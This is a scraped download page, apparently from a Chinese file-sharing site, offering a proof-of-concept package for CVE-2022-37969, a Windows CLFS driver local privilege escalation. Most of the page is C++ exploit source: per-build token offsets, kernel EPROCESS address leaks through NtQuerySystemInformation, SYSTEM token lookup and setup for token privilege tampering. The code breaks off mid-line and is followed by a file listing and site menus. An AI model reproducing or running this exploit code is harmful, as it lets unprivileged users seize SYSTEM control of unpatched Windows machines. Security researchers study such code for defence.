//
// Understanding the CVE-2022-37969 Windows Common Log File System Driver Local Privilege Escalation.
// Authors: Rainbow www.chwm.vip
//
#pragma warning (disable : 4005)
#include <stdio.h>
#include <iostream>
#include <windows.h>
#include <clfsw32.h>
#include <ntstatus.h>
#include <processthreadsapi.h>
#include <tlhelp32.h>
#include "ntos.h"
#include "crc32.h"
#pragma comment(lib, "ntdll.lib")
#pragma comment(lib, "Clfsw32.lib")
/*
Windows Server 2016 Standard ------>
Windows Server 2019 Standard ------> 17763 token offset: 0x4b8
Windows Server 2022 Standard ------> 20348 token offset: 0x4b8
Windows 10 Pro Version 21H1 -------> 19041 19043 offset: 0x4b8
Windows 10 Pro Version 21H2 -------> 19041 offset: 0x4b8
Windows 11 Pro Version 21H2 -------> 22000 token offset: 0x4b8
*/
//
// NT syscalls
//
#define SystemModuleInformation 0xb
#define SystemHandleInformation 0x10
typedef struct _SYSTEM_BIGPOOL_ENTRY {
union {
PVOID VirtualAddress;
ULONG_PTR NonPaged : 1;
};
SIZE_T SizeInBytes;
union {
UCHAR Tag[4];
ULONG TagUlong;
};
} SYSTEM_BIGPOOL_ENTRY, * PSYSTEM_BIGPOOL_ENTRY;
typedef struct _SYSTEM_BIGPOOL_INFORMATION {
ULONG Count;
SYSTEM_BIGPOOL_ENTRY AllocatedInfo[1];
} SYSTEM_BIGPOOL_INFORMATION, * PSYSTEM_BIGPOOL_INFORMATION;
typedef NTSTATUS(WINAPI* _NtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG);
typedef NTSTATUS(NTAPI* _NtWriteVirtualMemory)(HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T);
_NtQuerySystemInformation fnNtQuerySystemInformation = NULL;
_NtWriteVirtualMemory fnNtWriteVirtualMemory = NULL;
//
// Leaked addresses
//
DWORD64 g_EProcessAddress = 0;
DWORD64 g_EThreadAddress = 0;
DWORD64 g_TokenAddress, my_pidEprocess = 0;
//
// Version dependent offsets
//
#define OFFSET_OF_PREVIOUS_MODE 0x232
#define OFFSET_OF_WIN32PROCESS 0x3b0
#define OFFSET_OF_SEP_TOKEN_PRIVILEGES 0x40
#define OFFSET_OF_DCOMPOSITIONPROCESS 0x100
//
// CInteractionTrackerMarshaler object offsets
//
#define OFFSET_OF_FUNCTION 0x50
#define OBJECT_SIZE 0x1a0
typedef NTSTATUS func(HANDLE, HANDLE, PIO_APC_ROUTINE, PVOID, PIO_STATUS_BLOCK, ULONG, PVOID, ULONG, PVOID, ULONG);
// Global Variables
IO_STATUS_BLOCK v30;
IO_STATUS_BLOCK v31;
UINT64 offset_SeSetAccess = 0;
func* _NtFsControlFile;
UINT64 fnSeSetAccessStateGenericMapping = 0;
UINT64 offset_ClfsEarlier = 0;
UINT64 fnClfsEarlierLsn = 0;
CHAR clfs_path[] = { "\\SystemRoot\\System32\\drivers\\CLFS.SYS" };
FARPROC v22b = NULL;
UINT64 ntos_kernelBase = NULL;
UINT64 clfs_kernelBase = NULL;
WCHAR* stored_env_xfname = { 0 };
UINT64 v14 = 0;
UINT64 v15 = 0;
WCHAR* stored_env_containerfname = { 0 };
WCHAR* stored_env_containerfname2 = { 0 };
WCHAR* stored_env_containerfname3 = { 0 };
DWORD* hReadPipe[2] = { 0 };
UINT64 System_token_value = 0;
int numread;
#define NUMELEM 0x7a00
char buff[0x7a00];
INT64 v22 = 0;
INT64 v23 = 0;
INT64 v26 = 0;
INT64 v24 = 0;
INT64 v31b = 0;
INT64 v32 = 0;
UINT num_of_CLFS = 0;
PUINT p_num_of_CLFS = &num_of_CLFS; // number of CLFS tags
CHAR tag[] = { "Clfs" };
PUINT64 v10 = 0; // Offset of last field virtual address
int v9 = 0; // stores the amount of bigpool clfs tags
WCHAR* stored_env_fname;
DWORD _pid = 0;
DWORD pid_to_find = 0;
int token_offset = 0;
LONGLONG token_value = 0;
int winversion = 0;
WCHAR* stored_env_open;
WCHAR* foldr = nullptr;
DWORDLONG system_EPROCESS = 0;
PUINT64 kernelAddrArray = 0;
HANDLE hProcess = NULL;
HANDLE hThread = NULL;
HANDLE hToken = NULL;
HMODULE user32 = NULL;
int flag = 0;
int flag2 = 0;
UINT64 dest2 = 0;
UINT64 dest3 = 0;
UINT64 value2 = 0;
UINT64* value3 = 0;
UINT64 next_token;
// Get OS version to get TOKEN offsets
int getOSversion() {
char buff[100];
HKEY hKey;
DWORD cType;
wchar_t lpData[1024] = { 0 };
DWORD buffersize = sizeof(lpData);
int tokenOffset = 0;
memset(buff, 0, sizeof(buff)); // clear buffer
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"), NULL, KEY_READ, &hKey) == ERROR_SUCCESS)
{
printf("[+] Registry key Opened successfully\n");
}
else {
printf("[!] Failed to open reg key: %s\n", GetLastError());
exit(1);
}
RegQueryValueExW(hKey, TEXT(L"CurrentBuild"), NULL, &cType, (LPBYTE)lpData, &buffersize);
RegCloseKey(hKey);
// convert unicode to ansi
WideCharToMultiByte(CP_UTF8, 0, lpData, -1, (LPSTR)buff, 0x80, 0, 0);
// convert string to int
winversion = atoi(buff);
wprintf(L"[+] Windows Build Number: %i\n", winversion);
// check if versions are supported
if (winversion >= 17763 && winversion <= 22000) {
token_offset = 0x4b8; // store the token offset
}
else {
printf("[!] Version %d not supported. Exiting...\n", winversion);
}
return 0;
}
SIZE_T GetObjectKernelAddress(HANDLE Object)
{
PSYSTEM_HANDLE_INFORMATION_EX handleInfo = NULL;
ULONG handleInfoSize = 0x1000;
ULONG retLength;
NTSTATUS status;
SIZE_T kernelAddress = 0;
BOOL bFind = FALSE;
while (TRUE)
{
handleInfo = (PSYSTEM_HANDLE_INFORMATION_EX)LocalAlloc(LPTR, handleInfoSize);
status = fnNtQuerySystemInformation(SystemExtendedHandleInformation, handleInfo, handleInfoSize, &retLength);
if (status == 0xC0000004 || NT_SUCCESS(status)) // STATUS_INFO_LENGTH_MISMATCH
{
LocalFree(handleInfo);
handleInfoSize = retLength + 0x100;
handleInfo = (PSYSTEM_HANDLE_INFORMATION_EX)LocalAlloc(LPTR, handleInfoSize);
status = fnNtQuerySystemInformation(SystemExtendedHandleInformation, handleInfo, handleInfoSize, &retLength);
if (NT_SUCCESS(status))
{
for (ULONG i = 0; i < handleInfo->NumberOfHandles; i++)
{
if ((USHORT)Object == 0x4)
{
if (0x4 == (DWORD)handleInfo->Handles[i].UniqueProcessId && (SIZE_T)Object == (SIZE_T)handleInfo->Handles[i].HandleValue)
{
kernelAddress = (SIZE_T)handleInfo->Handles[i].Object;
bFind = TRUE;
break;
}
}
else
{
if (GetCurrentProcessId() == (DWORD)handleInfo->Handles[i].UniqueProcessId && (SIZE_T)Object == (SIZE_T)handleInfo->Handles[i].HandleValue)
{
kernelAddress = (SIZE_T)handleInfo->Handles[i].Object;
bFind = TRUE;
break;
}
}
}
}
}
if (handleInfo)
LocalFree(handleInfo);
if (bFind)
break;
}
return kernelAddress;
}
VOID InitEnvironment()
{
//
// Resolve NT syscalls
//
fnNtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(LoadLibrary("ntdll.dll"), "NtQuerySystemInformation");
DuplicateHandle(GetCurrentProcess(), GetCurrentProcess(), GetCurrentProcess(), &hProcess, 0, FALSE, DUPLICATE_SAME_ACCESS);
// printf("[+] HPROCESS %p\n", hProcess);
g_EProcessAddress = GetObjectKernelAddress(hProcess);
printf("[+] MY EPROCESSS %p\n", g_EProcessAddress);
system_EPROCESS = GetObjectKernelAddress((HANDLE)4);
printf("[+] SYSTEM EPROCESSS %p\n", system_EPROCESS);
return;
}
int checkAccessToken() {
int v8 = 0; // todavia no se que es
PHANDLE TokenHandle = 0; //
int savedHprocess = 0;
NTSTATUS status2;
ULONG size2;
NTSTATUS status3;
UINT64 v11 = 0;
PUINT v12 = 0;
user32 = LoadLibraryW(L"user32.dll");
int currentpid = GetCurrentProcessId();
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, 0, currentpid);
if (!hProcess) {
printf("[!] OpenProcess failed with error %d\n", GetLastError());
}
printf("[+] hProcess: 0x%x\n", hProcess);
savedHprocess = (UINT)hProcess;
if (!OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES, &hProcess)) {
printf("[!] OpenProcessToken failed with error %d\n", GetLastError());
return 0;
}
TokenHandle = &hProcess;
printf("[+] Token handle: 0x%x\n", TokenHandle);
VOID* v10 = malloc(0x20);
if (!v10) { exit(1); }
status2 = fnNtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandl
没有合适的资源?快使用搜索试试~ 我知道了~
温馨提示
CVE-2022-37969 是通用日志文件系统驱动 clfs 中的越界写入漏洞,通过该漏洞,可以完成提权。 // // Understanding the CVE-2022-37969 Windows Common Log File System Driver Local Privilege Escalation. // Authors: www.chwm.vip // #pragma warning (disable : 4005) #include <stdio.h> #include <iostream> #include <windows.h> #include <clfsw32.h> #include <ntstatus.h> #include <processthreadsapi.h> #include <tlhelp32.h> #include "ntos.h" #include "crc32.h" #pragma comment(lib, "ntdll.lib") #pragma comment(lib, "Clfsw32.lib")
资源推荐
资源详情
资源评论
收起资源包目录
CVE-2022-37969 Windows 本地权限提升 PoC (244个子文件)
CVE-2022-37969-PoC.cpp 30KB
b4ed0f91bf6823fb93d87ad79dd0d124.png 269KB
d65eb863fe21ffdc42bbce972bba9e23.png 197KB
bbe4add085f88155fdca2d80aaf411fc.png 169KB
31c5067008fb4e3aeecbbcad4efa48a2.png 163KB
062a4d88fbd5b2f8874971ef404849fc.png 159KB
4efa074269a969dea6488111b5c771e6.png 148KB
62fc27c4f669f0d43f4b299540a13ac0.png 146KB
894a5901138835bf86d4cc90b6221a89.png 141KB
30acc379766d76a0f8637d158a080d53.png 136KB
f2e29240c5cbe00476febbbb17272133.png 123KB
eb9c240128c49e22f0e89d1e690d82d8.png 113KB
dd3dc96e0d35558651c3bb1fc2c61d72.png 113KB
836961a9ab152d5ea12014163b77b2a5.png 112KB
07b271feca40cd1d4bd7f35359a976f8.png 112KB
e1b17c194be9dabe01f9c00af1fb1b9d.png 112KB
29754cdf9bfdcd6f59bed75e7f812401.png 111KB
13e9f602f744b96c56fa23709a1ee8b1.png 110KB
772edba280c0edd8ec8622fcd59900aa.png 106KB
1049c88b1e85f4da8ce6b2175fe8b481.png 105KB
f3babbfd6fa4125d92884ab26c55b042.png 102KB
6a1252644d847ed449b3b2de8efcc130.png 100KB
c4accb401ae49467f7bee324194fa8af.png 100KB
dbb90ba5d93649144f656755f8c018a1.png 98KB
90cc2ee4d222c458165d59cc1e25bb71.png 91KB
eb3b7da0b6379040789194b533cb84eb.png 90KB
65bedec4ef0269cf851c672ef23215d2.png 89KB
c0d9f742a42b19f21bc24529ed649844.png 89KB
fca5afe2dab2be700cfb1eed233d99dd.png 87KB
ef3ef67356c07a33d99110bb05ce82cd.png 85KB
0ab30090cb9fe5f506c98b531b6ab6e0.png 84KB
4b416f61b1a20ecd509b40d42b4446e0.png 82KB
0dd3fbe0c02c73af4136fcd4bba619ac.png 80KB
da7272b49df6e07b5e159a240767995b.png 79KB
8e97d31fb9a8e0d6c4fb940d7b638f3f.png 77KB
d37ba7da05c117dc914d5ee3de9a2256.png 76KB
796b36868271191e4b27df9313560b60.png 75KB
d2bad6aff3a8e437d6f6c734c9c486b8.png 75KB
938d70cacfe611e71cb18221b515d706.png 75KB
af11eaa7efe7d3bf27dd08914115495e.png 74KB
be7e567421244222596d7bfc10462109.png 72KB
cddb44cbcf1dd2dda0b6a957ef2bcaf6.png 71KB
17a6c9a5a3b217bb1cc4fe587dc9e46e.png 71KB
1e3c8617c79a20ee56f86be0476d97bc.png 70KB
8d8667795bdd2d3a52b6fb858a4f99bf.png 70KB
99d1ee82573d2cec22770ec41be3b11d.png 69KB
adf479c479b50ed46a74660af44b4b9e.png 66KB
6f51a4a8e84c007ec9d679a8b5a6e4a3.png 65KB
8a2f5ded5152701716b7709d538d0386.png 65KB
417e8cef456d0c7bb5dc7d25114aae07.png 65KB
75986e4d4775b8b65a227e8e86c20164.png 65KB
d9b89aeaeb48dea7922d4d49f14f0aa9.png 65KB
494e8a1ff997253f0b7f2e802dde7870.png 64KB
49eb5210a1118103c5e61be9bc366186.png 63KB
8aa56568274675fcf72804e582c7e2eb.png 62KB
14679dbd33d68eb3f3b57364d0a8ea3c.png 62KB
b2931ad454c3435a3c573af7bfc30dc7.png 62KB
34de80a6d13362fce18f7a4e46c6942e.png 61KB
4eddb63ff524603ecced2916eb4bd1a0.png 61KB
abcee5b3969810f323ae89b36c37429b.png 60KB
0149eb13d876c9445fbb21eb0b3b38ce.png 59KB
a2444a618e58697523dc2dbbe0fb7a98.png 59KB
37ce66c7038977148fe9e7e200442c33.png 59KB
a9b434c6072dc77b972aa8945960681f.png 59KB
133b888e7bd7e57096b2fab69e4059bb.png 59KB
2d58846b58a11952e391c71364ab5a69.png 59KB
b975353d4f8fdb5b16e19ae8f62a8134.png 58KB
58a86e211a46d533962a0d484ce7076c.png 56KB
7343ab15d357c6831c49430569f82228.png 55KB
344192097e052d9620c5acebfaeaef81.png 55KB
cd8cf02fe0597b74322f71cdc62e64ee.png 55KB
23bfbe262940032fba771e9010eeb594.png 55KB
8e822e7f85f131ee73502ef1a530aa2c.png 55KB
12cf6e1efd4dc79e4ddb3523a74e7582.png 54KB
3d7daf50eaf010c74f992545e017780d.png 54KB
2869084447c2d3dab338a6afa82e186e.png 54KB
d98138801c6468ed084b4a882ffbf5be.png 53KB
e1c25d0b0ae5611c356a3b0307d1f31e.png 51KB
519cb4c0f191a359419dda213b82c02d.png 51KB
9d6196c034cfa5f57efa1d543696e0ad.png 51KB
7c35a5b4f2bfd8945939cb2cccd35c01.png 51KB
d58d89618903d37fd132c1dd0d38374f.png 50KB
416f89dd29ccf939e67a61c40ce23e4d.png 50KB
bc755caae18e17258276891ca04c77bd.png 50KB
8c44d31c4b28f49ddc0bdff3c86656a1.png 50KB
36cca164f53318b93429edb0603c9139.png 49KB
ec7a6d54368b04538733a32ac5fc9eab.png 49KB
27bb8025f56cb83e0a7fe9f0297725f2.png 48KB
3f6652da3921f2d0f77868bef8f65a0e.png 47KB
e05be4c39ffa2fecc47531d82dc15c4c.png 46KB
097e76059eb6297bd706308d0c0f26a4.png 46KB
fe55b280956b8886cc94873606e1e758.png 46KB
a0c9313c580a8afa0fbf0fe88c839e70.png 46KB
569e806a0126db3be8dda672b613b0ce.png 46KB
08f0479d12f771e96aff9ff1c569b428.png 46KB
b9f75e1bf359cefcd13f3c0045ce0b24.png 45KB
a3747260ee434eaae7f00778be96202a.png 44KB
1016eb11bc91ef1b34fa555f239b5202.png 43KB
8c9a91225f1a90ae961c4bb6e846b538.png 43KB
c8f092d14e55486ed779cc6a9abedecc.png 42KB
共 244 条
- 1
- 2
- 3
资源评论
RainbowTechnology
- 粉丝: 145
- 资源: 34
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功